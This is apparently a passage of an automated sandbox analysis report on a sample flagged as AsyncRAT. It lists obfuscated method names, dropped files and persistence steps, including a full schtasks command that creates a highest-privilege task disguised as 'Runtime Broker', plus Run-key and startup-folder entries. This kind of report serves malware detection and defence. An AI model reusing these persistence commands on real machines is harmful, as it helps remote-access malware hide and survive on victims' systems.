'w08Zrv9021WUoVd5k7v1yyaT9vGJQgngBztfQu7b', 'tSIBHg4hj4rDCGP66cY8tcBz1mJoRFqNx3xRJGPi', 'cnfbJ0l5coNpDcFaVqH4KPJsqpdLrk05uVpzfD64', 'b4e5T9Vsn7sA5ATeitGY3FzI6KquCIXado8HeN1K', 'D5iotIuPr2IpnLKPVNJneO6ievNgVteI8jeNs20r'
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, s0bNe9DEmn4vM6ipvUKzuuWGMiwhF8jm87v9qNjX3mYDm1VmkjOjD8eeGbjtd4eSBRbW4zGyDC5noVPdSARrgeRtetwEDtLPGp.csHigh entropy of concatenated method names: '_71YpB3WsDwiwcdqJQiOqJdGj7Zw1RHRFqccIgLuBiFx0X0mM4fxj7hrEMdabxBbjWK1ivITzKWqxpl8wICA9xqwNMAAjqsbKO2', 'sKo3IOu6OR8xlJKpzp9u5pdeK2UPLOXwbESgXpfV4aZiBhumM671V4ZJphndrjx8FYIII9txkyx9oChoWBlh6LmFlPZmT0JSkC', 'yvQTB2l0n7nhS1uO1UutCbCEKE3ZcwfcdDWWdTALGNiXgkqftiGYl5qRhQd95DHTrxWCdDCiVMYTd3dol4I0pmixIoThT23For', 'GDtQGToK0Y4wmyHMNr9vfv3WNb1vUW4AnR8scvzya1lz5Rm0SyzQWktW0tLPYdljokNRiwRzDJSo5klWz4Urs9prPXFmSS1pM2', 'vcs1qe4kXrdFWmFUkIXXLc9UN', '_1qVZuxhxB0Ar77RDjrrnuqH9Q', 'veug0NdovoNJfg1r4S6tvzp8W', '_5cEFTHwaYLKV1qtVRrOzac4x2', 'L4snQdJyVo7IPSFxtdeGsdEfG', 'jlwh1WnUiLjO85TmaAu3Oa0eq'
                        Source: 0.2.80BvHOM51j.exe.1ee0bc0bf60.0.raw.unpack, 1IWwpmd4g6bNpXA7xoh7qb.csHigh entropy of concatenated method names: '_0PIz3RO6CEDuFNVFtXH6em', 'g7B0Wr7fmT6jx44gzQx05jS3S', 'KCkDLkj1fpfMKDGDHp4yIFbhm', 'O8lc7rnB3bHiE9eOBlf2tNoeJ', 'nJjyxDU7YUhFrLuBQXJZwWpcM'
                        Source: Runtime Broker.2.dr, akkQj1sqFfSSBzoPzzcJHWUTImoPHvJQ5obC9Mw1.csHigh entropy of concatenated method names: 'pAJejPeYzjpeABmxWAkwbiTw1mqxCBmWmzTSrx83', '_87FcV7zG86E30YrE8gQLgID0Pl0Rr8rZkIxWtvsL', 'v3sUlDIQcXFjjp98fRg32WcEry4fbZasOGIybWnP', '_84epM09kzCj1ocmmfMHdDDJHEGRKiElEqqmhabpMi6LzJY6cDBf2Vbkr6y', 'zSua969pyTVqty23ApV0ANHgAW7QrIlnwrBgTIVyrLUw8dJssslp6p58Ip', 'FnKRcw4KPNme0yZtl5FELK4OdN5xLbjT4cXFE4pfT1hFgAfHDJiRgSzpze', 'pc6HzlGBo11QPwPRRFQ6QRxbYEtDamkRqvINDP0CDIsZilUCHP6In3fFyu', '_82lVQ2aRHE9MNikTPEUcVF5nnzk8A7t3NtGHH2Nf0ii0pbq8qjriMOP8Lc', 'M297JKFH2OaGT0qMJHXjz69qKR52Hx7lNLBlEbEdrsfaB58kZw6qofBuHF', 'wlTS5WXqG2faQnePm2hvP6ctocY7uCb3JbkGwtH52XHtazaW4XP0FdlC0L'
                        Source: Runtime Broker.2.dr, MvsynE2XwtVDEliLiQwo3c.csHigh entropy of concatenated method names: 'ueNuYTmXQ6K8bfOElL57OU0hCnclTgziBvANqcTK', 'CBchHZE3WXHDMIFIqc5B43k2dzUvj6Crf6lCXYmY', 'arDnoot9r0xRAqgQNBWzZpMYSPsK0BYlt3OLGZav', 'y1Mq1pDHA1XXZwh82mGxkp5en9MUWuAwUltF827V'
                        Source: Runtime Broker.2.dr, Os6S553ieUGpaR9GelWERs.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'xishLqBUDDHpndP3Olfre38kEdoMck7seFJ9DibN', 'VR1rAbrBcGLrzpyEucWvGZChYhBDvpfhYfawlIUD', '_5XqXp0gqv8hTSag2ajjAvaGP10dcEs9cMBc4zc14', 'sVRWWQMYpJATbzfdzYcUeieHPwx1YqtvldaTNZ1S'
                        Source: Runtime Broker.2.dr, 0GxKZuckCqDxUPkmOCW34U.csHigh entropy of concatenated method names: 'Bmmzjl1eEbAyvOphJ3NWd7', 'SLK2lnpJa9DqMcztIV7Z6j', '_22uK1rjvw8vloqfU5w5X1X', 'HGPRHHTrnxEJWFsE9csHF5', 'juIdeSwIMWFfiPQ4drAnun', 'x76vGPuzOxXExP3IjzRh70', 'oXrEMZEoYSSPQxUVd7T9f4', 'YAhT9MPl1SE2dXfuYVR2ky', '_3aN0qCK0cpEAsjD3NIfE6B', 'Ls06vQidZK1lwZ26PYDiWby9PIdinAxtZ5Xn3vyvhMsdo0JEs1NbBDIIpnMUVhviMfm9Ja8qGnggbdS6bsYIdp80SjTToFasH7'
                        Source: Runtime Broker.2.dr, md2ft4QQ054AZsx7gfxFKY.csHigh entropy of concatenated method names: '_7PQzntkIgqUgQsMoxHJZqq', 'jIodqW6ONadRjjz3WeYp6M', 'qtSeqTl4ziWJXqLgA8o84m', 'p4BSyG1dlTL4n7KrKy4hsK', '_6zemP3ZIvCqECvrqusVCsL', 'ZTCPpNcUr2O2bUdrJzCojp', 'LjEKFO7CGv9NGo1ZhOgdI8', 'xxlCP1ulPAwtc8MF4NhcGe', '_212MJufRbVPyH2jCu3oIzf', '_4Xw4OXNI1d1qSYQpD01Hae'
                        Source: Runtime Broker.2.dr, RdUutxlZeW6b75qg39GcLx.csHigh entropy of concatenated method names: 'hwfypxN1I0Xu9nUKDI004X', 'LdBuwBfcBv4NnPEz8T8X7a', 'QUPNKB1P89B0FKSjeuXNWi', 'VrcnhbileTMnFeAld50Ovp', 'oOmkJuahCWBHIZeomGYZ0j', 'MrBI43GMqy0STlo4hSLczL', 'G54CpebrTzzlzj2DjH8IAk', 'eg2HijXfe1zzrpLn995PLd', 'FOiY6e46MAf7yAyJMJ8LWX', 'qZXTahmEtqkIzSId28uLue'
                        Source: Runtime Broker.2.dr, YebcPNnUFO90wmxhl0MY1ZHpDaQWqNuizhyA4TrgUQPuFv4liXqUc5RGXDmbxW5WViuzZfd4IyWHl43y534vtrIVxLU4tW93Fw.csHigh entropy of concatenated method names: 'smSCMyoMoDjr73Qxx8f7UbOP0VLwZbSmYOgGKdghi4wrWPRz1NrKCybK1egAf1LO0kChlRQ2F92NSFRuOCpiSRPp8VlolEkOOo', '_6Hz2tWriIwkMZKQolHgu9LsDb', 'VeUuCjc2n837zVct5vb35fJl6', 'wf71SGtTeYTCBhVM8b2w6WqzV', 'y9iqqkHxkE7su85s7hERtkyCo'
                        Source: Runtime Broker.2.dr, LoyGFB7AXqpjgvOg6wxGgp.csHigh entropy of concatenated method names: '_90W7Jaog83egtDjvo1o5CK', 'nJ7ntGzX47CKonow5A0vgp', 'O2xVHGv3U4E3w5rrfljzqj', 'g5eb3mckMWAVFx09ZDxluo', '_5urqIm7hHmmlwTDmBSd82J', 'k9TzoI18SmnxPyK0qnHODu', 'Vsy4NCzCRs6F6pxYXXb26i', 'gthzzVHmtJJWAXchBy7Eew', '_6mgXF19oU5LoB31TB9kHOT', 'ZX2dlDuEjxIkMalw7zmgSa'
                        Source: Runtime Broker.2.dr, v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.csHigh entropy of concatenated method names: 'XrADoq840cHVl6CXqxGMP0DbxEcYtW0vM95TENDS2IOaSzVWwn0isSymulrP7YLhY5VoRrOlqw6bfSMQqwHQSbHBLLAa1Ef4rj', 'uW5xitMio0iacA9UF293v0e3WSHWMxtjNbG5Skmmr5Y3a4vPEDfGReA1D8SpxwIlnIaZfcJPjqD5lCH5vmX1tQAZg8WE3CqsF8', '_1fEUqyLy3B2qErJ4vF2ufGQsyFZbqhsAXmP2lp5ihY4PRn6Fr6athamcEUT4cykdTIN7KUx7RVLdqj8gEhdDFceAusqoPoQCPN', 'KCfZCDt0yV2c1oxyjxvp05iKyEhWfwbC0VQiBUwv', 'U0mZo5C4qSvfxFexd5aj2RAP7gAvtaKlduVrGo9O', 'w08Zrv9021WUoVd5k7v1yyaT9vGJQgngBztfQu7b', 'tSIBHg4hj4rDCGP66cY8tcBz1mJoRFqNx3xRJGPi', 'cnfbJ0l5coNpDcFaVqH4KPJsqpdLrk05uVpzfD64', 'b4e5T9Vsn7sA5ATeitGY3FzI6KquCIXado8HeN1K', 'D5iotIuPr2IpnLKPVNJneO6ievNgVteI8jeNs20r'
                        Source: Runtime Broker.2.dr, s0bNe9DEmn4vM6ipvUKzuuWGMiwhF8jm87v9qNjX3mYDm1VmkjOjD8eeGbjtd4eSBRbW4zGyDC5noVPdSARrgeRtetwEDtLPGp.csHigh entropy of concatenated method names: '_71YpB3WsDwiwcdqJQiOqJdGj7Zw1RHRFqccIgLuBiFx0X0mM4fxj7hrEMdabxBbjWK1ivITzKWqxpl8wICA9xqwNMAAjqsbKO2', 'sKo3IOu6OR8xlJKpzp9u5pdeK2UPLOXwbESgXpfV4aZiBhumM671V4ZJphndrjx8FYIII9txkyx9oChoWBlh6LmFlPZmT0JSkC', 'yvQTB2l0n7nhS1uO1UutCbCEKE3ZcwfcdDWWdTALGNiXgkqftiGYl5qRhQd95DHTrxWCdDCiVMYTd3dol4I0pmixIoThT23For', 'GDtQGToK0Y4wmyHMNr9vfv3WNb1vUW4AnR8scvzya1lz5Rm0SyzQWktW0tLPYdljokNRiwRzDJSo5klWz4Urs9prPXFmSS1pM2', 'vcs1qe4kXrdFWmFUkIXXLc9UN', '_1qVZuxhxB0Ar77RDjrrnuqH9Q', 'veug0NdovoNJfg1r4S6tvzp8W', '_5cEFTHwaYLKV1qtVRrOzac4x2', 'L4snQdJyVo7IPSFxtdeGsdEfG', 'jlwh1WnUiLjO85TmaAu3Oa0eq'
                        Source: Runtime Broker.2.dr, 1IWwpmd4g6bNpXA7xoh7qb.csHigh entropy of concatenated method names: '_0PIz3RO6CEDuFNVFtXH6em', 'g7B0Wr7fmT6jx44gzQx05jS3S', 'KCkDLkj1fpfMKDGDHp4yIFbhm', 'O8lc7rnB3bHiE9eOBlf2tNoeJ', 'nJjyxDU7YUhFrLuBQXJZwWpcM'
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, akkQj1sqFfSSBzoPzzcJHWUTImoPHvJQ5obC9Mw1.csHigh entropy of concatenated method names: 'pAJejPeYzjpeABmxWAkwbiTw1mqxCBmWmzTSrx83', '_87FcV7zG86E30YrE8gQLgID0Pl0Rr8rZkIxWtvsL', 'v3sUlDIQcXFjjp98fRg32WcEry4fbZasOGIybWnP', '_84epM09kzCj1ocmmfMHdDDJHEGRKiElEqqmhabpMi6LzJY6cDBf2Vbkr6y', 'zSua969pyTVqty23ApV0ANHgAW7QrIlnwrBgTIVyrLUw8dJssslp6p58Ip', 'FnKRcw4KPNme0yZtl5FELK4OdN5xLbjT4cXFE4pfT1hFgAfHDJiRgSzpze', 'pc6HzlGBo11QPwPRRFQ6QRxbYEtDamkRqvINDP0CDIsZilUCHP6In3fFyu', '_82lVQ2aRHE9MNikTPEUcVF5nnzk8A7t3NtGHH2Nf0ii0pbq8qjriMOP8Lc', 'M297JKFH2OaGT0qMJHXjz69qKR52Hx7lNLBlEbEdrsfaB58kZw6qofBuHF', 'wlTS5WXqG2faQnePm2hvP6ctocY7uCb3JbkGwtH52XHtazaW4XP0FdlC0L'
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, MvsynE2XwtVDEliLiQwo3c.csHigh entropy of concatenated method names: 'ueNuYTmXQ6K8bfOElL57OU0hCnclTgziBvANqcTK', 'CBchHZE3WXHDMIFIqc5B43k2dzUvj6Crf6lCXYmY', 'arDnoot9r0xRAqgQNBWzZpMYSPsK0BYlt3OLGZav', 'y1Mq1pDHA1XXZwh82mGxkp5en9MUWuAwUltF827V'
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, Os6S553ieUGpaR9GelWERs.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'xishLqBUDDHpndP3Olfre38kEdoMck7seFJ9DibN', 'VR1rAbrBcGLrzpyEucWvGZChYhBDvpfhYfawlIUD', '_5XqXp0gqv8hTSag2ajjAvaGP10dcEs9cMBc4zc14', 'sVRWWQMYpJATbzfdzYcUeieHPwx1YqtvldaTNZ1S'
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, 0GxKZuckCqDxUPkmOCW34U.csHigh entropy of concatenated method names: 'Bmmzjl1eEbAyvOphJ3NWd7', 'SLK2lnpJa9DqMcztIV7Z6j', '_22uK1rjvw8vloqfU5w5X1X', 'HGPRHHTrnxEJWFsE9csHF5', 'juIdeSwIMWFfiPQ4drAnun', 'x76vGPuzOxXExP3IjzRh70', 'oXrEMZEoYSSPQxUVd7T9f4', 'YAhT9MPl1SE2dXfuYVR2ky', '_3aN0qCK0cpEAsjD3NIfE6B', 'Ls06vQidZK1lwZ26PYDiWby9PIdinAxtZ5Xn3vyvhMsdo0JEs1NbBDIIpnMUVhviMfm9Ja8qGnggbdS6bsYIdp80SjTToFasH7'
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, md2ft4QQ054AZsx7gfxFKY.csHigh entropy of concatenated method names: '_7PQzntkIgqUgQsMoxHJZqq', 'jIodqW6ONadRjjz3WeYp6M', 'qtSeqTl4ziWJXqLgA8o84m', 'p4BSyG1dlTL4n7KrKy4hsK', '_6zemP3ZIvCqECvrqusVCsL', 'ZTCPpNcUr2O2bUdrJzCojp', 'LjEKFO7CGv9NGo1ZhOgdI8', 'xxlCP1ulPAwtc8MF4NhcGe', '_212MJufRbVPyH2jCu3oIzf', '_4Xw4OXNI1d1qSYQpD01Hae'
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, RdUutxlZeW6b75qg39GcLx.csHigh entropy of concatenated method names: 'hwfypxN1I0Xu9nUKDI004X', 'LdBuwBfcBv4NnPEz8T8X7a', 'QUPNKB1P89B0FKSjeuXNWi', 'VrcnhbileTMnFeAld50Ovp', 'oOmkJuahCWBHIZeomGYZ0j', 'MrBI43GMqy0STlo4hSLczL', 'G54CpebrTzzlzj2DjH8IAk', 'eg2HijXfe1zzrpLn995PLd', 'FOiY6e46MAf7yAyJMJ8LWX', 'qZXTahmEtqkIzSId28uLue'
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, YebcPNnUFO90wmxhl0MY1ZHpDaQWqNuizhyA4TrgUQPuFv4liXqUc5RGXDmbxW5WViuzZfd4IyWHl43y534vtrIVxLU4tW93Fw.csHigh entropy of concatenated method names: 'smSCMyoMoDjr73Qxx8f7UbOP0VLwZbSmYOgGKdghi4wrWPRz1NrKCybK1egAf1LO0kChlRQ2F92NSFRuOCpiSRPp8VlolEkOOo', '_6Hz2tWriIwkMZKQolHgu9LsDb', 'VeUuCjc2n837zVct5vb35fJl6', 'wf71SGtTeYTCBhVM8b2w6WqzV', 'y9iqqkHxkE7su85s7hERtkyCo'
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, LoyGFB7AXqpjgvOg6wxGgp.csHigh entropy of concatenated method names: '_90W7Jaog83egtDjvo1o5CK', 'nJ7ntGzX47CKonow5A0vgp', 'O2xVHGv3U4E3w5rrfljzqj', 'g5eb3mckMWAVFx09ZDxluo', '_5urqIm7hHmmlwTDmBSd82J', 'k9TzoI18SmnxPyK0qnHODu', 'Vsy4NCzCRs6F6pxYXXb26i', 'gthzzVHmtJJWAXchBy7Eew', '_6mgXF19oU5LoB31TB9kHOT', 'ZX2dlDuEjxIkMalw7zmgSa'
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, v3PUPliSrRwajxOVLYu7vQWg1nl9cRDbIWcPu9FDSMGDs9M5dyDOj4Kg8YRh8Qs7IDXosTFkN4kzioKZ1ollrdyfkTdo5Jf780.csHigh entropy of concatenated method names: 'XrADoq840cHVl6CXqxGMP0DbxEcYtW0vM95TENDS2IOaSzVWwn0isSymulrP7YLhY5VoRrOlqw6bfSMQqwHQSbHBLLAa1Ef4rj', 'uW5xitMio0iacA9UF293v0e3WSHWMxtjNbG5Skmmr5Y3a4vPEDfGReA1D8SpxwIlnIaZfcJPjqD5lCH5vmX1tQAZg8WE3CqsF8', '_1fEUqyLy3B2qErJ4vF2ufGQsyFZbqhsAXmP2lp5ihY4PRn6Fr6athamcEUT4cykdTIN7KUx7RVLdqj8gEhdDFceAusqoPoQCPN', 'KCfZCDt0yV2c1oxyjxvp05iKyEhWfwbC0VQiBUwv', 'U0mZo5C4qSvfxFexd5aj2RAP7gAvtaKlduVrGo9O', 'w08Zrv9021WUoVd5k7v1yyaT9vGJQgngBztfQu7b', 'tSIBHg4hj4rDCGP66cY8tcBz1mJoRFqNx3xRJGPi', 'cnfbJ0l5coNpDcFaVqH4KPJsqpdLrk05uVpzfD64', 'b4e5T9Vsn7sA5ATeitGY3FzI6KquCIXado8HeN1K', 'D5iotIuPr2IpnLKPVNJneO6ievNgVteI8jeNs20r'
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, s0bNe9DEmn4vM6ipvUKzuuWGMiwhF8jm87v9qNjX3mYDm1VmkjOjD8eeGbjtd4eSBRbW4zGyDC5noVPdSARrgeRtetwEDtLPGp.csHigh entropy of concatenated method names: '_71YpB3WsDwiwcdqJQiOqJdGj7Zw1RHRFqccIgLuBiFx0X0mM4fxj7hrEMdabxBbjWK1ivITzKWqxpl8wICA9xqwNMAAjqsbKO2', 'sKo3IOu6OR8xlJKpzp9u5pdeK2UPLOXwbESgXpfV4aZiBhumM671V4ZJphndrjx8FYIII9txkyx9oChoWBlh6LmFlPZmT0JSkC', 'yvQTB2l0n7nhS1uO1UutCbCEKE3ZcwfcdDWWdTALGNiXgkqftiGYl5qRhQd95DHTrxWCdDCiVMYTd3dol4I0pmixIoThT23For', 'GDtQGToK0Y4wmyHMNr9vfv3WNb1vUW4AnR8scvzya1lz5Rm0SyzQWktW0tLPYdljokNRiwRzDJSo5klWz4Urs9prPXFmSS1pM2', 'vcs1qe4kXrdFWmFUkIXXLc9UN', '_1qVZuxhxB0Ar77RDjrrnuqH9Q', 'veug0NdovoNJfg1r4S6tvzp8W', '_5cEFTHwaYLKV1qtVRrOzac4x2', 'L4snQdJyVo7IPSFxtdeGsdEfG', 'jlwh1WnUiLjO85TmaAu3Oa0eq'
                        Source: 2.2.coonfart.exe.12d61a78.0.raw.unpack, 1IWwpmd4g6bNpXA7xoh7qb.csHigh entropy of concatenated method names: '_0PIz3RO6CEDuFNVFtXH6em', 'g7B0Wr7fmT6jx44gzQx05jS3S', 'KCkDLkj1fpfMKDGDHp4yIFbhm', 'O8lc7rnB3bHiE9eOBlf2tNoeJ', 'nJjyxDU7YUhFrLuBQXJZwWpcM'
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]Jump to dropped file
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile created: C:\Users\Public\Runtime BrokerJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile created: C:\Users\Public\Runtime BrokerJump to dropped file
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\45b52685-cc32-47e5-abd7-306bfc875622[1]Jump to dropped file
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile created: C:\Users\Public\Runtime BrokerJump to dropped file

                        Boot Survival

                        barindex
                        Yara detected AsyncRAT
                        Source: Yara matchFile source: Process Memory Space: coonfart.exe PID: 4320, type: MEMORYSTR
                        Drops PE files to the startup folder
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeJump to dropped file
                        Drops PE files to the user root directory
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile created: C:\Users\Public\Runtime BrokerJump to dropped file
                        Drops script or batch files to the startup folder
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.batJump to dropped file
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broker" /tr "C:\Users\Public\Runtime Broker"
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.batJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Runtime Broker.lnkJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Runtime BrokerJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Runtime BrokerJump to behavior

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Loading BitLocker PowerShell Module
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\80BvHOM51j.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\coonfart.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
